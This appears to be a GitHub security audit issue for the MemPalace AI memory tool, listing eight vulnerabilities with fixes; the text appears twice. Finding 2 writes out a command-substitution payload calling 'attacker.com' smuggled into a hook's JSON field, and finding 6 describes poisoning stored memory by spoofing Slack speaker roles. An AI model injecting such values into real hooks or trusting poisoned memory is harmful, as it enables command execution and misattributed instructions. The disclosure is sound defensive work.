Security Audit Report
Hi Milla, Ben, and the MemPalace community!
I ran a full security audit on the v3.2.0 codebase (commit 6614b9b, develop branch) before deploying MemPalace in my own workflow. I found 8 previously unreported vulnerabilities that I'd like to flag — and I'm happy to submit PRs for all of them.
I checked existing issues and PRs before filing this. #401 (security hardening RFC), #477 (search limit), #438 (precompact session_id + regex escape), and #782 (ChromaDB telemetry) cover some related ground but the findings below are not covered by any existing issue or PR.
CRITICAL
1. Wikipedia SSRF in entity_registry.py — violates local-first guarantee
File: mempalace/entity_registry.py, lines 176–257
_wikipedia_lookup() makes an outbound HTTPS GET to https://en.wikipedia.org/api/rest_v1/page/summary/{word} whenever research() is called. This is in the core package, not a benchmark or optional module.
- Any entity name extracted during mining gets sent to Wikipedia
- User's IP is disclosed to Wikipedia (and any network observer)
- Directly violates CLAUDE.md: "Privacy by architecture — The system physically cannot send your data because it never leaves your machine"
Additionally, if Wikipedia returns 404, the word is classified as "person" with 0.70 confidence (lines 246–254), which poisons the entity registry with false positives.
Suggested fix: Make research() local-only by default. Require explicit allow_network=True opt-in for Wikipedia lookups, and return "unknown" with low confidence on 404 instead of asserting person.
2. Shell injection via eval in mempal_save_hook.sh — stop_hook_active not sanitized
File: hooks/mempal_save_hook.sh, lines 68–80
The save hook uses eval to parse Python output into shell variables. The stop_hook_active field is not passed through the safe() lambda (unlike session_id and transcript_path):
eval $(echo "$INPUT" | python3 -c "
...
safe = lambda s: re.sub(r'[^a-zA-Z0-9_/.\-~]', '', str(s))
print(f'SESSION_ID=\"{safe(sid)}\"')
print(f'STOP_HOOK_ACTIVE=\"{sha}\"') # ← NOT sanitized
print(f'TRANSCRIPT_PATH=\"{safe(tp)}\"')
")
If the JSON input contains "stop_hook_active": "$(curl attacker.com)", bash will execute the command substitution inside eval.
Suggested fix: Validate stop_hook_active is strictly True or False before printing:
sha_raw = data.get('stop_hook_active', False)
sha = 'True' if sha_raw is True or str(sha_raw).lower() in ('true', '1') else 'False'
3. transcript_path from stdin opens arbitrary files in hooks_cli.py
File: mempalace/hooks_cli.py, lines 42–77, 124–126
transcript_path is read from the stdin JSON and passed to _count_human_messages() which calls Path(transcript_path).expanduser() and opens the file. No containment check ensures the path is within the expected Claude Code sessions directory.
Suggested fix: Validate the resolved path is under the expected root (e.g., ~/.claude/projects) and has a .jsonl/.json extension before opening.
HIGH
4. Arithmetic injection in mempal_save_hook.sh
File: hooks/mempal_save_hook.sh, lines 120–124
LAST_SAVE=$(cat "$LAST_SAVE_FILE")
SINCE_LAST=$((EXCHANGE_COUNT - LAST_SAVE))
LAST_SAVE is read from a state file and used directly in $((...)) without validating it's an integer. Bash arithmetic evaluates command substitutions.
Suggested fix:
if [[ "$LAST_SAVE_RAW" =~ ^[0-9]+$ ]]; then
LAST_SAVE="$LAST_SAVE_RAW"
fi
MEDIUM
5. File permissions — 6 locations create sensitive files world-readable
On Linux with default umask (022), these files are created 644/755 (world-readable):
| File |
What's exposed |
hooks_cli.py:84 — ~/.mempalace/hook_state/ |
Session IDs, timestamps |
entity_registry.py:311 — entity_registry.json |
Names of all people, relationships, aliases |
knowledge_graph.py:53 — knowledge_graph.sqlite3 |
Every temporal fact ever stored |
exporter.py:51 — export output directory |
Complete verbatim memory palace |
config.py:227 — people_map.json |
Name mappings for all people |
mcp_server.py:92 — WAL file (TOCTOU race) |
Write audit log |
Suggested fix: Apply chmod(0o700) to directories and chmod(0o600) to files immediately after creation, with try/except (OSError, NotImplementedError): pass for Windows compatibility.
6. Slack transcript role spoofing in normalize.py
File: mempalace/normalize.py, lines 276–306
The Slack JSON parser assigns "user" to the first speaker and "assistant" to the second, purely by position. A crafted Slack export where an attacker's message is first gets stored with role "user", making attacker-written text appear as the memory owner's own words in all future retrieval.
Suggested fix: Label Slack-sourced transcripts with a provenance header indicating multi-party chat origin, and don't assign user/assistant roles to arbitrary speakers.
7. palace_path from env var not normalized
File: mempalace/config.py, lines 143–148
MEMPALACE_PALACE_PATH from environment is used as-is, without os.path.abspath() or expanduser(). This differs from the --palace CLI arg (which gets abspath at mcp_server.py:62). A value with ../ components could redirect palace storage.
Suggested fix: Apply os.path.abspath(os.path.expanduser(env_val)) in the config loader.
8. Date fields in KG tools not validated
File: mempalace/mcp_server.py, line 748; knowledge_graph.py, lines 219–242
as_of, valid_from, valid_to parameters from MCP calls reach SQLite without format validation. While parameterized queries prevent SQL injection, invalid date strings silently break temporal filtering (queries return empty results instead of matching facts).
Suggested fix: Add an ISO-8601 date format validator at the MCP boundary:
_DATE_RE = re.compile(r'^\d{4}-(?:0[1-9]|1[0-2])(?:-(?:0[1-9]|[12]\d|3[01]))?$')
Relationship to existing issues/PRs
Next steps
I'm happy to submit focused PRs for each finding, targeting develop:
fix/security-wikipedia-ssrf — Finding 1
fix/security-hook-injection — Findings 2, 3, 4
fix/security-file-permissions — Finding 5
fix/security-normalize-roles — Finding 6
fix/security-config-validation — Findings 7, 8
Let me know if you'd prefer a different grouping or if any of these are already being worked on internally.
Thanks for building MemPalace — it's a great project and I want to help make it solid.
— @Kesshite
Security Audit Report
Hi Milla, Ben, and the MemPalace community!
I ran a full security audit on the v3.2.0 codebase (commit
6614b9b,developbranch) before deploying MemPalace in my own workflow. I found 8 previously unreported vulnerabilities that I'd like to flag — and I'm happy to submit PRs for all of them.I checked existing issues and PRs before filing this. #401 (security hardening RFC), #477 (search limit), #438 (precompact session_id + regex escape), and #782 (ChromaDB telemetry) cover some related ground but the findings below are not covered by any existing issue or PR.
CRITICAL
1. Wikipedia SSRF in
entity_registry.py— violates local-first guaranteeFile:
mempalace/entity_registry.py, lines 176–257_wikipedia_lookup()makes an outbound HTTPS GET tohttps://en.wikipedia.org/api/rest_v1/page/summary/{word}wheneverresearch()is called. This is in the core package, not a benchmark or optional module.Additionally, if Wikipedia returns 404, the word is classified as
"person"with 0.70 confidence (lines 246–254), which poisons the entity registry with false positives.Suggested fix: Make
research()local-only by default. Require explicitallow_network=Trueopt-in for Wikipedia lookups, and return"unknown"with low confidence on 404 instead of asserting person.2. Shell injection via
evalinmempal_save_hook.sh—stop_hook_activenot sanitizedFile:
hooks/mempal_save_hook.sh, lines 68–80The save hook uses
evalto parse Python output into shell variables. Thestop_hook_activefield is not passed through thesafe()lambda (unlikesession_idandtranscript_path):If the JSON input contains
"stop_hook_active": "$(curl attacker.com)", bash will execute the command substitution insideeval.Suggested fix: Validate
stop_hook_activeis strictlyTrueorFalsebefore printing:3.
transcript_pathfrom stdin opens arbitrary files inhooks_cli.pyFile:
mempalace/hooks_cli.py, lines 42–77, 124–126transcript_pathis read from the stdin JSON and passed to_count_human_messages()which callsPath(transcript_path).expanduser()and opens the file. No containment check ensures the path is within the expected Claude Code sessions directory.Suggested fix: Validate the resolved path is under the expected root (e.g.,
~/.claude/projects) and has a.jsonl/.jsonextension before opening.HIGH
4. Arithmetic injection in
mempal_save_hook.shFile:
hooks/mempal_save_hook.sh, lines 120–124LAST_SAVEis read from a state file and used directly in$((...))without validating it's an integer. Bash arithmetic evaluates command substitutions.Suggested fix:
MEDIUM
5. File permissions — 6 locations create sensitive files world-readable
On Linux with default umask (022), these files are created
644/755(world-readable):hooks_cli.py:84—~/.mempalace/hook_state/entity_registry.py:311—entity_registry.jsonknowledge_graph.py:53—knowledge_graph.sqlite3exporter.py:51— export output directoryconfig.py:227—people_map.jsonmcp_server.py:92— WAL file (TOCTOU race)Suggested fix: Apply
chmod(0o700)to directories andchmod(0o600)to files immediately after creation, withtry/except (OSError, NotImplementedError): passfor Windows compatibility.6. Slack transcript role spoofing in
normalize.pyFile:
mempalace/normalize.py, lines 276–306The Slack JSON parser assigns
"user"to the first speaker and"assistant"to the second, purely by position. A crafted Slack export where an attacker's message is first gets stored with role"user", making attacker-written text appear as the memory owner's own words in all future retrieval.Suggested fix: Label Slack-sourced transcripts with a provenance header indicating multi-party chat origin, and don't assign
user/assistantroles to arbitrary speakers.7.
palace_pathfrom env var not normalizedFile:
mempalace/config.py, lines 143–148MEMPALACE_PALACE_PATHfrom environment is used as-is, withoutos.path.abspath()orexpanduser(). This differs from the--palaceCLI arg (which getsabspathatmcp_server.py:62). A value with../components could redirect palace storage.Suggested fix: Apply
os.path.abspath(os.path.expanduser(env_val))in the config loader.8. Date fields in KG tools not validated
File:
mempalace/mcp_server.py, line 748;knowledge_graph.py, lines 219–242as_of,valid_from,valid_toparameters from MCP calls reach SQLite without format validation. While parameterized queries prevent SQL injection, invalid date strings silently break temporal filtering (queries return empty results instead of matching facts).Suggested fix: Add an ISO-8601 date format validator at the MCP boundary:
Relationship to existing issues/PRs
session_idsanitization and regex escape. Our finding 2 covers the save hookevalissue which fix: escape regex metacharacters in extract_people and sanitize session_id in precompact hook #438 does not address.Next steps
I'm happy to submit focused PRs for each finding, targeting
develop:fix/security-wikipedia-ssrf— Finding 1fix/security-hook-injection— Findings 2, 3, 4fix/security-file-permissions— Finding 5fix/security-normalize-roles— Finding 6fix/security-config-validation— Findings 7, 8Let me know if you'd prefer a different grouping or if any of these are already being worked on internally.
Thanks for building MemPalace — it's a great project and I want to help make it solid.
— @Kesshite